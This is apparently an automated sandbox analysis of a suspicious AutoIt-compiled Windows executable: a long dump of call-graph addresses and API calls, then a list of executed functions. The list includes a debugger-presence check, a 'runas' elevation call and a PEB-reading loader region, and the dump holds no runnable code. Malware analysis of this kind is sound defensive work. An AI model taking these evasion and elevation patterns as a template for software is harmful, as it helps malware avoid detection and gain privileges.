calls __write_nolock 99626->99743 99630 78e889 99628->99630 99631 756ccf 99628->99631 99629 756c6c 99632 7577c7 59 API calls 99629->99632 99633 755dcf CloseHandle 99630->99633 99634 7577c7 59 API calls 99631->99634 99635 756c78 99632->99635 99636 78e895 99633->99636 99637 756cd8 99634->99637 99638 7548ae 60 API calls 99635->99638 99639 754f3d 136 API calls 99636->99639 99640 7577c7 59 API calls 99637->99640 99641 756c86 99638->99641 99642 78e8b1 99639->99642 99643 756ce1 99640->99643 99744 7559b0 ReadFile SetFilePointerEx 99641->99744 99646 78e8da 99642->99646 99650 7b97e5 122 API calls 99642->99650 99753 7546f9 99643->99753 99817 7afcb1 89 API calls 4 library calls 99646->99817 99647 756cf8 99651 757c8e 59 API calls 99647->99651 99649 756cb2 99745 755c4e 99649->99745 99653 78e8cd 99650->99653 99656 756d09 SetCurrentDirectoryW 99651->99656 99654 78e8d5 99653->99654 99655 78e8f6 99653->99655 99657 754faa 84 API calls 99654->99657 99658 754faa 84 API calls 99655->99658 99662 756d1c Mailbox 99656->99662 99657->99646 99660 78e8fb 99658->99660 99659 756e6c Mailbox 99724 755934 99659->99724 99661 770ff6 Mailbox 59 API calls 99660->99661 99668 78e92f 99661->99668 99664 770ff6 Mailbox 59 API calls 99662->99664 99666 756d2f 99664->99666 99665 753bcd 99665->98381 99665->98404 99667 75538e 59 API calls 99666->99667 99669 75766f 59 API calls 99668->99669 99700 78e978 Mailbox 99669->99700 99671 78eb69 99822 7b7581 59 API calls Mailbox 99671->99822 99677 78eb8b 99823 7bf835 59 API calls 2 library calls 99677->99823 99680 78eb98 99682 772f95 _free 58 API calls 99680->99682 99682->99659 99685 75766f 59 API calls 99685->99700 99695 757f41 59 API calls 99695->99700 99699 78ebbb 99824 7afcb1 89 API calls 4 library calls 99699->99824 99700->99671 99700->99685 99700->99695 99700->99699 99818 7afc4d 59 API calls 2 library calls 99700->99818 99819 7afb6e 61 API calls 2 library calls 99700->99819 99820 7b7621 59 API calls Mailbox 99700->99820 99821 757373 59 API calls Mailbox 99700->99821 99702 78ebd4 99703 772f95 _free 58 API calls 99702->99703 99704 78e8f1 99703->99704 99704->99659 99706 75770f 99705->99706 99709 757682 _memmove 99705->99709 99708 770ff6 Mailbox 59 API calls 99706->99708 99707 770ff6 Mailbox 59 API calls 99711 757689 99707->99711 99708->99709 99709->99707 99710 7576b2 99710->99592 99711->99710 99712 770ff6 Mailbox 59 API calls 99711->99712 99712->99710 99714 7574d0 99713->99714 99717 75757e 99713->99717 99715 770ff6 Mailbox 59 API calls 99714->99715 99718 757502 99714->99718 99715->99718 99716 770ff6 59 API calls Mailbox 99716->99718 99717->99592 99718->99716 99718->99717 99719->99583 99720->99592 99721->99592 99722->99592 99723->99594 99725 755dcf CloseHandle 99724->99725 99726 75593c Mailbox 99725->99726 99727 755dcf CloseHandle 99726->99727 99728 75594b 99727->99728 99728->99665 99729->99619 99731 755dcf CloseHandle 99730->99731 99732 755962 99731->99732 99827 755df9 99732->99827 99734 755981 99735 7559a4 99734->99735 99835 755770 99734->99835 99735->99618 99735->99623 99737 755993 99852 7553db SetFilePointerEx SetFilePointerEx 99737->99852 99739 75599a 99739->99735 99740 78e030 99739->99740 99853 7b3696 SetFilePointerEx SetFilePointerEx WriteFile 99740->99853 99742 78e060 99742->99735 99743->99629 99744->99649 99752 755c68 99745->99752 99746 755cef SetFilePointerEx 99866 755dae SetFilePointerEx 99746->99866 99749 78e151 99867 755dae SetFilePointerEx 99749->99867 99750 755cc3 99750->99628 99751 78e16b 99752->99746 99752->99749 99752->99750 99754 7577c7 59 API calls 99753->99754 99755 75470f 99754->99755 99756 7577c7 59 API calls 99755->99756 99757 754717 99756->99757 99758 7577c7 59 API calls 99757->99758 99759 75471f 99758->99759 99760 7577c7 59 API calls 99759->99760 99761 754727 99760->99761 99762 78d8fb 99761->99762 99763 75475b 99761->99763 99764 7581a7 59 API calls 99762->99764 99765 7579ab 59 API calls 99763->99765 99766 78d904 99764->99766 99767 754769 99765->99767 99768 757eec 59 API calls 99766->99768 99769 757e8c 59 API calls 99767->99769 99771 75479e 99768->99771 99770 754773 99769->99770 99770->99771 99772 7579ab 59 API calls 99770->99772 99773 7547de 99771->99773 99775 7547bd 99771->99775 99786 78d924 99771->99786 99776 754794 99772->99776 99868 7579ab 99773->99868 99777 757b52 59 API calls 99775->99777 99780 757e8c 59 API calls 99776->99780 99781 7547c7 99777->99781 99778 7547ef 99782 754801 99778->99782 99784 7581a7 59 API calls 99778->99784 99779 78d9f4 99783 757d2c 59 API calls 99779->99783 99780->99771 99781->99773 99788 7579ab 59 API calls 99781->99788 99785 754811 99782->99785 99789 7581a7 59 API calls 99782->99789 99799 78d9b1 99783->99799 99784->99782 99787 754818 99785->99787 99791 7581a7 59 API calls 99785->99791 99786->99779 99790 78d9dd 99786->99790 99798 78d95b 99786->99798 99792 7581a7 59 API calls 99787->99792 99801 75481f Mailbox 99787->99801 99788->99773 99789->99785 99790->99779 99795 78d9c8 99790->99795 99791->99787 99792->99801 99793 757b52 59 API calls 99793->99799 99794 78d9b9 99796 757d2c 59 API calls 99794->99796 99797 757d2c 59 API calls 99795->99797 99796->99799 99797->99799 99798->99794 99802 78d9a4 99798->99802 99799->99773 99799->99793 99881 757a84 59 API calls 2 library calls 99799->99881 99801->99647 99803 757d2c 59 API calls 99802->99803 99803->99799 99815->99618 99816->99624 99817->99704 99818->99700 99819->99700 99820->99700 99821->99700 99822->99677 99823->99680 99824->99702 99828 755e12 CreateFileW 99827->99828 99829 78e181 99827->99829 99830 755e34 99828->99830 99829->99830 99831 78e187 CreateFileW 99829->99831 99830->99734 99831->99830 99832 78e1ad 99831->99832 99833 755c4e 2 API calls 99832->99833 99834 78e1b8 99833->99834 99834->99830 99836 78dfce 99835->99836 99837 75578b 99835->99837 99851 75581a 99836->99851 99860 755e3f 99836->99860 99838 755c4e 2 API calls 99837->99838 99837->99851 99839 7557ad 99838->99839 99840 75538e 59 API calls 99839->99840 99842 7557b7 99840->99842 99842->99836 99843 7557c4 99842->99843 99844 770ff6 Mailbox 59 API calls 99843->99844 99845 7557cf 99844->99845 99846 75538e 59 API calls 99845->99846 99847 7557da 99846->99847 99854 755d20 99847->99854 99850 755c4e 2 API calls 99850->99851 99851->99737 99852->99739 99853->99742 99855 755d93 99854->99855 99856 755d2e 99854->99856 99865 755dae SetFilePointerEx 99855->99865 99857 755807 99856->99857 99859 755d66 ReadFile 99856->99859 99857->99850 99859->99856 99859->99857 99861 755c4e 2 API calls 99860->99861 99862 755e60 99861->99862 99863 755c4e 2 API calls 99862->99863 99864 755e74 99863->99864 99864->99851 99865->99856 99866->99750 99867->99751 99869 757a17 99868->99869 99870 7579ba 99868->99870 99871 757e8c 59 API calls 99869->99871 99870->99869 99872 7579c5 99870->99872 99878 7579e8 _memmove 99871->99878 99873 7579e0 99872->99873 99874 78ef32 99872->99874 99876 758087 59 API calls 99873->99876 99875 758189 59 API calls 99874->99875 99877 78ef3c 99875->99877 99876->99878 99879 770ff6 Mailbox 59 API calls 99877->99879 99878->99778 99880 78ef5c 99879->99880 99881->99799 99883 756ef5 99882->99883 99888 757009 99882->99888 99884 770ff6 Mailbox 59 API calls 99883->99884 99883->99888 99886 756f1c 99884->99886 99885 770ff6 Mailbox 59 API calls 99892 756f91 99885->99892 99886->99885 99888->98520 99890 7574bd 59 API calls 99890->99892 99891 75766f 59 API calls 99891->99892 99892->99888 99892->99890 99892->99891 99895 7563a0 99892->99895 99921 7a6ac9 59 API calls Mailbox 99892->99921 99893->98522 99894->98524 99922 757b76 99895->99922 99897 7565ca 99898 75766f 59 API calls 99897->99898 99899 7565e4 Mailbox 99898->99899 99899->99892 99902 78e41f 99931 7afdba 91 API calls 4 library calls 99902->99931 99903 7568f9 99903->99899 99932 7afdba 91 API calls 4 library calls 99903->99932 99907 75766f 59 API calls 99914 7563c5 99907->99914 99908 757eec 59 API calls 99908->99914 99909 78e42d 99912 78e3bb 99913 758189 59 API calls 99912->99913 99915 78e3c6 99913->99915 99914->99897 99914->99902 99914->99903 99914->99907 99914->99908 99914->99912 99917 757faf 59 API calls 99914->99917 99920 78e3eb _memmove 99914->99920 99927 7560cc 60 API calls 99914->99927 99928 755ea1 59 API calls Mailbox 99914->99928 99929 755fd2 60 API calls 99914->99929 99930 757a84 59 API calls 2 library calls 99914->99930 99918 75659b CharUpperBuffW 99917->99918 99918->99914 99920->99902 99920->99903 99921->99892 99923 770ff6 Mailbox 59 API calls 99922->99923 99924 757b9b 99923->99924 99925 758189 59 API calls 99924->99925 99926 757baa 99925->99926 99926->99914 99927->99914 99928->99914 99929->99914 99930->99914 99931->99909 99932->99899 99933->98539 99934->98538 99936 78d638 99935->99936 99937 754227 99935->99937 99936->99937 99937->98548 99961 7b3226 62 API calls _W_store_winword 99937->99961 99961->98548 100024->98565 100025->98565 100026->98565 100468 753633 100469 75366a 100468->100469 100470 7536e7 100469->100470 100471 753688 100469->100471 100507 7536e5 100469->100507 100475 78d31c 100470->100475 100476 7536ed 100470->100476 100472 753695 100471->100472 100473 75375d PostQuitMessage 100471->100473 100477 7536a0 100472->100477 100478 78d38f 100472->100478 100509 7536d8 100473->100509 100474 7536ca DefWindowProcW 100474->100509 100518 7611d0 10 API calls Mailbox 100475->100518 100480 753715 SetTimer RegisterWindowMessageW 100476->100480 100481 7536f2 100476->100481 100482 753767 100477->100482 100483 7536a8 100477->100483 100522 7b2a16 71 API calls _memset 100478->100522 100484 75373e CreatePopupMenu 100480->100484 100480->100509 100487 78d2bf 100481->100487 100488 7536f9 KillTimer 100481->100488 100516 754531 64 API calls _memset 100482->100516 100489 7536b3 100483->100489 100490 78d374 100483->100490 100484->100509 100486 78d343 100519 7611f3 341 API calls Mailbox 100486->100519 100493 78d2f8 MoveWindow 100487->100493 100494 78d2c4 100487->100494 100513 7544cb Shell_NotifyIconW _memset 100488->100513 100496 75374b 100489->100496 100498 7536be 100489->100498 100490->100474 100521 7a817e 59 API calls Mailbox 100490->100521 100493->100509 100500 78d2c8 100494->100500 100501 78d2e7 SetFocus 100494->100501 100515 7545df 81 API calls _memset 100496->100515 100497 78d3a1 100497->100474 100497->100509 100498->100474 100520 7544cb Shell_NotifyIconW _memset 100498->100520 100499 75375b 100499->100509 100500->100498 100506 78d2d1 100500->100506 100501->100509 100502 75370c 100514 753114 DeleteObject DestroyWindow Mailbox 100502->100514 100517 7611d0 10 API calls Mailbox 100506->100517 100507->100474 100511 78d368 100512 7543db 68 API calls 100511->100512 100512->100507 100513->100502 100514->100509 100515->100499 100516->100499 100517->100509 100518->100486 100519->100498 100520->100511 100521->100507 100522->100497 100523 75107d 100528 7571eb 100523->100528 100525 75108c 100526 772f80 __cinit 67 API calls 100525->100526 100527 751096 100526->100527 100529 7571fb __write_nolock 100528->100529 100530 7577c7 59 API calls 100529->100530 100531 7572b1 100530->100531 100532 754864 61 API calls 100531->100532 100533 7572ba 100532->100533 100559 77074f 100533->100559 100536 757e0b 59 API calls 100537 7572d3 100536->100537 100538 753f84 59 API calls 100537->100538 100539 7572e2 100538->100539 100540 7577c7 59 API calls 100539->100540 100541 7572eb 100540->100541 100542 757eec 59 API calls 100541->100542 100543 7572f4 RegOpenKeyExW 100542->100543 100544 78ecda RegQueryValueExW 100543->100544 100548 757316 Mailbox 100543->100548 100545 78ed6c RegCloseKey 100544->100545 100546 78ecf7 100544->100546 100545->100548 100558 78ed7e _wcscat Mailbox __wsetenvp 100545->100558 100547 770ff6 Mailbox 59 API calls 100546->100547 100549 78ed10 100547->100549 100548->100525 100550 75538e 59 API calls 100549->100550 100551 78ed1b RegQueryValueExW 100550->100551 100552 78ed38 100551->100552 100555 78ed52 100551->100555 100553 757d2c 59 API calls 100552->100553 100553->100555 100554 757b52 59 API calls 100554->100558 100555->100545 100556 757f41 59 API calls 100556->100558 100557 753f84 59 API calls 100557->100558 100558->100548 100558->100554 100558->100556 100558->100557 100560 781b90 __write_nolock 100559->100560 100561 77075c GetFullPathNameW 100560->100561 100562 77077e 100561->100562 100563 757d2c 59 API calls 100562->100563 100564 7572c5 100563->100564 100564->100536 100565 36c23b0 100579 36c0000 100565->100579 100567 36c2475 100582 36c22a0 100567->100582 100585 36c34a0 GetPEB 100579->100585 100581 36c068b 100581->100567 100583 36c22a9 Sleep 100582->100583 100584 36c22b7 100583->100584 100586 36c34ca 100585->100586 100586->100581 100587 78ff06 100588 78ff10 100587->100588 100593 75ac90 Mailbox _memmove 100587->100593 100827 758e34 59 API calls Mailbox 100588->100827 100591 75b685 100832 7ba0b5 89 API calls 4 library calls 100591->100832 100593->100591 100600 75a1b7 100593->100600 100604 75a097 Mailbox 100593->100604 100606 757f41 59 API calls 100593->100606 100617 7cbf80 341 API calls 100593->100617 100620 75b416 100593->100620 100622 75a000 341 API calls 100593->100622 100623 790c94 100593->100623 100625 790ca2 100593->100625 100628 75b37c 100593->100628 100630 770ff6 59 API calls Mailbox 100593->100630 100636 75ade2 Mailbox 100593->100636 100780 7cc5f4 100593->100780 100812 7b7be0 100593->100812 100818 7a66f4 100593->100818 100828 7a7405 59 API calls 100593->100828 100829 7cc4a7 85 API calls 2 library calls 100593->100829 100594 770ff6 59 API calls Mailbox 100594->100604 100597 75b5da 100837 7ba0b5 89 API calls 4 library calls 100597->100837 100599 75b5d5 100602 7581a7 59 API calls 100599->100602 100602->100600 100603 79047f 100831 7ba0b5 89 API calls 4 library calls 100603->100831 100604->100594 100604->100597 100604->100599 100604->100600 100604->100603 100608 7581a7 59 API calls 100604->100608 100610 7577c7 59 API calls 100604->100610 100611 7a7405 59 API calls 100604->100611 100613 772f80 67 API calls __cinit 100604->100613 100615 790e00 100604->100615 100618 75a6ba 100604->100618 100821 75ca20 341 API calls 2 library calls 100604->100821 100822 75ba60 60 API calls Mailbox 100604->100822 100606->100593 100608->100604 100609 79048e 100610->100604 100611->100604 100613->100604 100614 7a66f4 Mailbox 59 API calls 100614->100600 100836 7ba0b5 89 API calls 4 library calls 100615->100836 100617->100593 100835 7ba0b5 89 API calls 4 library calls 100618->100835 100826 75f803 341 API calls 100620->100826 100622->100593 100833 759df0 59 API calls Mailbox 100623->100833 100834 7ba0b5 89 API calls 4 library calls 100625->100834 100627 790c86 100627->100600 100627->100614 100824 759e9c 60 API calls Mailbox 100628->100824 100630->100593 100631 75b38d 100825 759e9c 60 API calls Mailbox 100631->100825 100636->100591 100636->100600 100636->100627 100637 7900e0 VariantClear 100636->100637 100643 7c474d 100636->100643 100652 7ce237 100636->100652 100655 762123 100636->100655 100695 7bd2e6 100636->100695 100742 7d23c9 100636->100742 100823 759df0 59 API calls Mailbox 100636->100823 100830 7a7405 59 API calls 100636->100830 100637->100636 100644 759997 84 API calls 100643->100644 100645 7c4787 100644->100645 100646 7563a0 94 API calls 100645->100646 100647 7c4797 100646->100647 100648 7c47bc 100647->100648 100649 75a000 341 API calls 100647->100649 100651 7c47c0 100648->100651 100838 759bf8 100648->100838 100649->100648 100651->100636 100653 7ccdf1 130 API calls 100652->100653 100654 7ce247 100653->100654 100654->100636 100656 759bf8 59 API calls 100655->100656 100657 76213b 100656->100657 100658 770ff6 Mailbox 59 API calls 100657->100658 100661 7969af 100657->100661 100660 762154 100658->100660 100663 762164 100660->100663 100866 755906 60 API calls Mailbox 100660->100866 100662 762189 100661->100662 100870 7bf7df 59 API calls 100661->100870 100666 759c9c 59 API calls 100662->100666 100670 762196 100662->100670 100665 759997 84 API calls 100663->100665 100667 762172 100665->100667 100668 7969f7 100666->100668 100669 755956 67 API calls 100667->100669 100668->100670 100671 7969ff 100668->100671 100672 762181 100669->100672 100674 755e3f 2 API calls 100670->100674 100673 759c9c 59 API calls 100671->100673 100672->100661 100672->100662 100869 755a1a CloseHandle 100672->100869 100676 76219d 100673->100676 100674->100676 100677 7621b7 100676->100677 100678 796a11 100676->100678 100679 7577c7 59 API calls 100677->100679 100680 770ff6 Mailbox 59 API calls 100678->100680 100681 7621bf 100679->100681 100682 796a17 100680->100682 100851 7556d2 100681->100851 100684 796a2b 100682->100684 100871 7559b0 ReadFile SetFilePointerEx 100682->100871 100689 796a2f _memmove 100684->100689 100872 7b794e 59 API calls 2 library calls 100684->100872 100686 7621ce 100686->100689 100867 759b9c 59 API calls Mailbox 100686->100867 100690 7621e2 Mailbox 100691 76221c 100690->100691 100692 755dcf CloseHandle 100690->100692 100691->100636 100693 762210 100692->100693 100693->100691 100868 755a1a CloseHandle 100693->100868 100696 7bd310 100695->100696 100697 7bd305 100695->100697 100701 7577c7 59 API calls 100696->100701 100740 7bd3ea Mailbox 100696->100740 100698 759c9c 59 API calls 100697->100698 100698->100696 100699 770ff6 Mailbox 59 API calls 100700 7bd433 100699->100700 100702 7bd43f 100700->100702 100897 755906 60 API calls Mailbox 100700->100897 100703 7bd334 100701->100703 100706 759997 84 API calls 100702->100706 100705 7577c7 59 API calls 100703->100705 100707 7bd33d 100705->100707 100709 7bd457 100706->100709 100708 759997 84 API calls 100707->100708 100710 7bd349 100708->100710 100711 755956 67 API calls 100709->100711 100713 7546f9 59 API calls 100710->100713 100712 7bd466 100711->100712 100714 7bd46a GetLastError 100712->100714 100723 7bd49e 100712->100723 100715 7bd35e 100713->100715 100719 7bd483 100714->100719 100716 757c8e 59 API calls 100715->100716 100720 7bd391 100716->100720 100717 7bd4c9 100724 770ff6 Mailbox 59 API calls 100717->100724 100718 7bd500 100722 770ff6 Mailbox 59 API calls 100718->100722 100737 7bd3f3 Mailbox 100719->100737 100898 755a1a CloseHandle 100719->100898 100721 7bd3e3 100720->100721 100728 7b3e73 3 API calls 100720->100728 100727 759c9c 59 API calls 100721->100727 100729 7bd505 100722->100729 100723->100717 100723->100718 100725 7bd4ce 100724->100725 100730 7bd4df 100725->100730 100732 7577c7 59 API calls 100725->100732 100727->100740 100731 7bd3a1 100728->100731 100734 7577c7 59 API calls 100729->100734 100729->100737 100899 7bf835 59 API calls 2 library calls 100730->100899 100731->100721 100733 7bd3a5 100731->100733 100732->100730 100736 757f41 59 API calls 100733->100736 100734->100737 100738 7bd3b2 100736->100738 100737->100636 100896 7b3c66 63 API calls Mailbox 100738->100896 100740->100699 100740->100737 100741 7bd3bb Mailbox 100741->100721 100743 7577c7 59 API calls 100742->100743 100744 7d23e0 100743->100744 100745 759997 84 API calls 100744->100745 100746 7d23ef 100745->100746 100747 757b76 59 API calls 100746->100747 100748 7d2402 100747->100748 100749 759997 84 API calls 100748->100749 100750 7d240f 100749->100750 100751 7d249d 100750->100751 100752 7d2429 100750->100752 100753 759997 84 API calls 100751->100753 100754 759c9c 59 API calls 100752->100754 100755 7d24a2 100753->100755 100756 7d242e 100754->100756 100757 7d24ce 100755->100757 100758 7d24b0 100755->100758 100759 7d248c 100756->100759 100763 7d2445 100756->100763 100760 7d24e3 100757->100760 100764 759c9c 59 API calls 100757->100764 100762 759bf8 59 API calls 100758->100762 100761 759bf8 59 API calls 100759->100761 100765 7d24f8 100760->100765 100768 759c9c 59 API calls 100760->100768 100766 7d2499 Mailbox 100761->100766 100762->100766 100767 7579ab 59 API calls 100763->100767 100764->100760 100769 7580d7 59 API calls 100765->100769 100766->100636 100770 7d2452 100767->100770 100768->100765 100771 7d2512 100769->100771 100772 757c8e 59 API calls 100770->100772 100900 7af8f2 100771->100900 100774 7d2460 100772->100774 100775 7579ab 59 API calls 100774->100775 100776 7d2479 100775->100776 100777 757c8e 59 API calls 100776->100777 100779 7d2487 100777->100779 100919 759b9c 59 API calls Mailbox 100779->100919 100781 7577c7 59 API calls 100780->100781 100782 7cc608 100781->100782 100783 7577c7 59 API calls 100782->100783 100784 7cc610 100783->100784 100785 7577c7 59 API calls 100784->100785 100786 7cc618 100785->100786 100787 759997 84 API calls 100786->100787 100811 7cc626 100787->100811 100788 757a84 59 API calls 100788->100811 100789 757d2c 59 API calls 100789->100811 100790 7cc80f 100791 7cc83c Mailbox 100790->100791 100922 759b9c 59 API calls Mailbox 100790->100922 100791->100593 100792 7cc7f6 100796 757e0b 59 API calls 100792->100796 100794 7cc811 100798 757e0b 59 API calls 100794->100798 100795 7581a7 59 API calls 100795->100811 100797 7cc803 100796->100797 100799 757c8e 59 API calls 100797->100799 100800 7cc820 100798->100800 100799->100790 100802 757c8e 59 API calls 100800->100802 100801 757faf 59 API calls 100804 7cc6bd CharUpperBuffW 100801->100804 100802->100790 100803 757faf 59 API calls 100805 7cc77d CharUpperBuffW 100803->100805 100920 75859a 68 API calls 100804->100920 100921 75c707 69 API calls 2 library calls 100805->100921 100808 759997 84 API calls 100808->100811 100809 757e0b 59 API calls 100809->100811 100810 757c8e 59 API calls 100810->100811 100811->100788 100811->100789 100811->100790 100811->100791 100811->100792 100811->100794 100811->100795 100811->100801 100811->100803 100811->100808 100811->100809 100811->100810 100813 7b7bec 100812->100813 100814 770ff6 Mailbox 59 API calls 100813->100814 100815 7b7bfa 100814->100815 100816 7b7c08 100815->100816 100817 7577c7 59 API calls 100815->100817 100816->100593 100817->100816 100923 7a6636 100818->100923 100820 7a6702 100820->100593 100821->100604 100822->100604 100823->100636 100824->100631 100825->100620 100826->100591 100827->100593 100828->100593 100829->100593 100830->100636 100831->100609 100832->100627 100833->100627 100834->100627 100835->100600 100836->100597 100837->100600 100839 78fbff 100838->100839 100841 759c08 100838->100841 100840 78fc10 100839->100840 100842 757d2c 59 API calls 100839->100842 100843 757eec 59 API calls 100840->100843 100845 770ff6 Mailbox 59 API calls 100841->100845 100842->100840 100844 78fc1a 100843->100844 100848 759c34 100844->100848 100849 7577c7 59 API calls 100844->100849 100846 759c1b 100845->100846 100846->100844 100847 759c26 100846->100847 100847->100848 100850 757f41 59 API calls 100847->100850 100848->100651 100849->100848 100850->100848 100852 755702 100851->100852 100853 7556dd 100851->100853 100854 757eec 59 API calls 100852->100854 100853->100852 100857 7556ec 100853->100857 100858 7b349a 100854->100858 100855 7b34c9 100855->100686 100875 755c18 100857->100875 100858->100855 100873 7b3436 ReadFile SetFilePointerEx 100858->100873 100874 757a84 59 API calls 2 library calls 100858->100874 100865 7b35d8 Mailbox 100865->100686 100866->100663 100867->100690 100868->100691 100869->100661 100870->100661 100871->100684 100872->100689 100873->100858 100874->100858 100876 770ff6 Mailbox 59 API calls 100875->100876 100877 755c2b 100876->100877 100878 770ff6 Mailbox 59 API calls 100877->100878 100879 755c37 100878->100879 100880 755632 100879->100880 100887 755a2f 100880->100887 100882 755674 100882->100865 100886 75793a 61 API calls Mailbox 100882->100886 100883 755d20 2 API calls 100884 755643 100883->100884 100884->100882 100884->100883 100894 755bda 59 API calls 2 library calls 100884->100894 100886->100865 100888 755a40 100887->100888 100889 78e065 100887->100889 100888->100884 100895 7a6443 59 API calls Mailbox 100889->100895 100891 78e06f 100892 770ff6 Mailbox 59 API calls 100891->100892 100893 78e07b 100892->100893 100894->100884 100895->100891 100896->100741 100897->100702 100898->100737 100899->100737 100901 7577c7 59 API calls 100900->100901 100902 7af905 100901->100902 100903 757b76 59 API calls 100902->100903 100904 7af919 100903->100904 100905 7af658 61 API calls 100904->100905 100911 7af93b 100904->100911 100906 7af935 100905->100906 100908 7579ab 59 API calls 100906->100908 100906->100911 100907 7af658 61 API calls 100907->100911 100908->100911 100909 7af9b5 100912 7579ab 59 API calls 100909->100912 100910 7579ab 59 API calls 100910->100911 100911->100907 100911->100909 100911->100910 100913 757c8e 59 API calls 100911->100913 100914 7af9ce 100912->100914 100913->100911 100915 757c8e 59 API calls 100914->100915 100916 7af9da 100915->100916 100917 7580d7 59 API calls 100916->100917 100918 7af9e9 Mailbox 100916->100918 100917->100918 100918->100779 100919->100766 100920->100811 100921->100811 100922->100791 100924 7a665e 100923->100924 100925 7a6641 100923->100925 100924->100820 100925->100924 100927 7a6621 59 API calls Mailbox 100925->100927 100927->100925 100928 75e70b 100931 75d260 100928->100931 100930 75e719 100932 75d27d 100931->100932 100961 75d4dd 100931->100961 100933 792abb 100932->100933 100934 792b0a 100932->100934 100953 75d2a4 100932->100953 100937 792abe 100933->100937 100944 792ad9 100933->100944 100975 7ca6fb 341 API calls __cinit 100934->100975 100938 792aca 100937->100938 100937->100953 100973 7cad0f 341 API calls 100938->100973 100939 772f80 __cinit 67 API calls 100939->100953 100942 792cdf 100942->100942 100943 75d6ab 100943->100930 100944->100961 100974 7cb1b7 341 API calls 3 library calls 100944->100974 100946 75d594 100967 758bb2 68 API calls 100946->100967 100949 75d5a3 100949->100930 100950 792c26 100979 7caa66 89 API calls 100950->100979 100953->100939 100953->100943 100953->100946 100953->100950 100954 758620 69 API calls 100953->100954 100953->100961 100962 75a000 341 API calls 100953->100962 100963 7581a7 59 API calls 100953->100963 100965 7588a0 68 API calls __cinit 100953->100965 100966 7586a2 68 API calls 100953->100966 100968 75859a 68 API calls 100953->100968 100969 75d0dc 341 API calls 100953->100969 100970 759f3a 59 API calls Mailbox 100953->100970 100971 75d060 89 API calls 100953->100971 100972 75cedd 341 API calls 100953->100972 100976 758bb2 68 API calls 100953->100976 100977 759e9c 60 API calls Mailbox 100953->100977 100978 7a6d03 60 API calls 100953->100978 100954->100953 100961->100943 100980 7ba0b5 89 API calls 4 library calls 100961->100980 100962->100953 100963->100953 100965->100953 100966->100953 100967->100949 100968->100953 100969->100953 100970->100953 100971->100953 100972->100953 100973->100943 100974->100961 100975->100953 100976->100953 100977->100953 100978->100953 100979->100961 100980->100942 100981 790226 100987 75ade2 Mailbox 100981->100987 100983 790c86 100984 7a66f4 Mailbox 59 API calls 100983->100984 100985 790c8f 100984->100985 100987->100983 100987->100985 100988 7900e0 VariantClear 100987->100988 100989 75b6c1 100987->100989 100991 7c474d 341 API calls 100987->100991 100992 7d23c9 87 API calls 100987->100992 100993 762123 95 API calls 100987->100993 100994 7ce237 130 API calls 100987->100994 100995 7bd2e6 101 API calls 100987->100995 100996 759df0 59 API calls Mailbox 100987->100996 100997 7a7405 59 API calls 100987->100997 100988->100987 100998 7ba0b5 89 API calls 4 library calls 100989->100998 100991->100987 100992->100987 100993->100987 100994->100987 100995->100987 100996->100987 100997->100987 100998->100983 100999 75568a 101000 755c18 59 API calls 100999->101000 101001 75569c 101000->101001 101002 755632 61 API calls 101001->101002 101003 7556aa 101002->101003 101005 7556ba Mailbox 101003->101005 101006 7581c1 61 API calls Mailbox 101003->101006 101006->101005

                    Executed Functions

                    Function 00753B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00753B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,008162F8,008162E0,?,?), ref: 00753BFD
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                      • Part of subcall function 00760A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00753C26,008162F8,?,?,?), ref: 00760ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00753C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008093F0,00000010), ref: 0078D4BC
                    • SetCurrentDirectoryW.KERNEL32(?,008162F8,?,?,?), ref: 0078D4F4
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00805D40,008162F8,?,?,?), ref: 0078D57A
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0078D581
                      • Part of subcall function 00753A58: GetSysColorBrush.USER32(0000000F), ref: 00753A62
                      • Part of subcall function 00753A58: LoadCursorW.USER32(00000000,00007F00), ref: 00753A71
                      • Part of subcall function 00753A58: LoadIconW.USER32(00000063), ref: 00753A88
                      • Part of subcall function 00753A58: LoadIconW.USER32(000000A4), ref: 00753A9A
                      • Part of subcall function 00753A58: LoadIconW.USER32(000000A2), ref: 00753AAC
                      • Part of subcall function 00753A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AD2
                      • Part of subcall function 00753A58: RegisterClassExW.USER32(?), ref: 00753B28
                      • Part of subcall function 007539E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A15
                      • Part of subcall function 007539E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A36
                      • Part of subcall function 007539E7: ShowWindow.USER32(00000000,?,?), ref: 00753A4A
                      • Part of subcall function 007539E7: ShowWindow.USER32(00000000,?,?), ref: 00753A53
                      • Part of subcall function 007543DB: _memset.LIBCMT ref: 00754401
                      • Part of subcall function 007543DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007544A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
